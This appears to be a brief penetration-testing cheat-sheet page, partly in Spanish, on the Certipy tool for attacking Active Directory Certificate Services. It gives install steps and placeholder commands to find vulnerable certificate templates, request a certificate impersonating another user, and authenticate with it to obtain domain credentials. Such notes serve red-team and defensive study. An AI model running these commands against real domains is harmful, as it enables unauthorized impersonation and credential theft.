search

Certipy

https://github.com/ly4k/Certipyarrow-up-right

hashtag
Install

git clone https://github.com/ly4k/Certipy.git
cd Certipy
python3 -m venv .
source bin/activate
python3 -m pip install certipy-ad
sudo mv ../Certipy /opt
# Modificar el shebang de /opt/Certipy/bin/Certipy para que apunte a #!/opt/Certipy/bin/python3
sudo ln -s /opt/Certipy/bin/certipy /usr/local/bin/certipy

Buscar vulnerabilidad en plantillas de certificados

certipy find -u <USER> -p <PASSWORD> -dc-ip <DC-IP> -vulnerable -stdout

Solicitar certificado suplantando identidad

certipy -debug req -u <USER> -p <PASSWORD> -dc-ip <DC-IP> -ca <CERT-AUTH> -template <TEMPLATE> -upn <UPN> -target <TARGET> -key-size <KEY-SIZE> -sid <SID>

Obtener credenciales válidas para el dominio

certipy auth -pfx <PFX-FILE> -username <USERNAME> -domain <DOMAIN> -dc-ip <DC-IP>
PreviousBypass-UACNextchangepasswd

Last updated